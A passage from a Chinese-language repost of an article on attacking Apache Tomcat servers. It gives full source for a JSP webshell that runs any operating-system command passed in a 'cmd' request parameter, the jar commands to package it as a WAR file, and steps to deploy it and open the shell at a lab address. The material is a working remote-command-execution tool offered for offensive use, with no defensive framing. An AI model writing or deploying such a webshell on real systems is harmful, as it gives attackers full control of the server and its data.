攻击Tomcat的多种姿势

一旦执行了上述命令，我们就可以直接获得一个webshell了，如下图所示：

生成JSP webshell

接下来，我们就来看看如何生成和部署webshell来获得Tomcat应用中的执行命令。

首先，我们需要写一个webshell并且打包成war格式。我们可以使用下面的代码来写一个webshell：

<%@ page import="java.io.*" %> 
<% 
   String cmd = request.getParameter("cmd"); 
   String output = ""; 
   if(cmd != null) { 
      String s = null; 
      try { 
         Process p = Runtime.getRuntime().exec(cmd,null,null); 
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 
         while((s = sI.readLine()) != null) { output += s+" 
"; } 
      }  catch(IOException e) {   e.printStackTrace();   } 
   } 
%> 
<%=output %> 

保存代码为index.jsp文件，然后使用下列命令来打包：

mkdir webshell 
cp index.jsp webshell/ 
cd webshell 
jar -cvf ../webshell.war * 

执行完这条命令，你就能生成一个war文件，你可以将这个war文件部署在Tomcat应用中。

如下图所示，你可以看到，我已经成功上传并部署了webshell.war文件，现在我们点击这个文件来执行：

在执行/webshell时，你会得到一个404错误页面，现在再执行webshell下的index.jsp文件，如下：

http://192.168.1.106:8080/webshell/index.jsp

访问了上述URL后，你会得到一个命令执行的表单，现在你就可以在这个表单上任意执行cmd命令了，如图：

本文到此结束，希望大家有所收获。

（编辑：晋中站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!